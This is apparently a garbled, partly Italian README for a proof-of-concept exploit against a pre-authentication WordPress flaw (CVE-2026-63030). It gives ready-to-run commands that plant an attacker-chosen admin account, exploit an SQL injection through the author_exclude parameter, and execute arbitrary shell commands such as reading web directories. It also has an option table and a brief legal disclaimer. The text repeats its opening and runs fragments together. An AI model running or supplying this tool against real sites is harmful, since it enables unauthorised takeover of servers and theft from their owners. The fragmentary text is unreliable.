
Exploit proof-of-concept per CVE-2026-63030, una vulnerabilità di pre-autenticazione in WordPress (versioni dalla 6.9.0 alla 7.0.1).
Exploit proof-of-concept per CVE-2026-63030, una vulnerabilità pre-autenticazione in WordPress (versioni da 6.9.0 a 7.0.1). Combina:
author_excludepython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude malevolo, sfruttando la confusione delle route per eseguire una query UNION.shell_exec().Questo è solo un proof-of-concept.
È pensato per:
Non utilizzarlo contro sistemi che non possiedi o per i quali non hai un'esplicita autorizzazione scritta al test. Gli autori non si assumono alcuna responsabilità per un uso improprio.
wp-config.php indurito, l'SQLi potrebbe fallire.DISALLOW_FILE_MODS e DISALLOW_UNFILTERED_HTML nella configurazione del target.| Argomento | Descrizione |
|---|
--url | URL root del WordPress di destinazione (obbligatorio) |
--username | Nome utente admin da creare (generato automaticamente se omesso) |
--password | Password admin (generata automaticamente se omessa) |
--email | Email admin (generata automaticamente se omessa) |
--command, -c | Comando da eseguire tramite il plugin (predefinito: id) |
--post-id | Specifica l'ID di un post pubblicato (rilevato automaticamente se omesso) |
--timeout | Timeout HTTP in secondi (predefinito: 60) |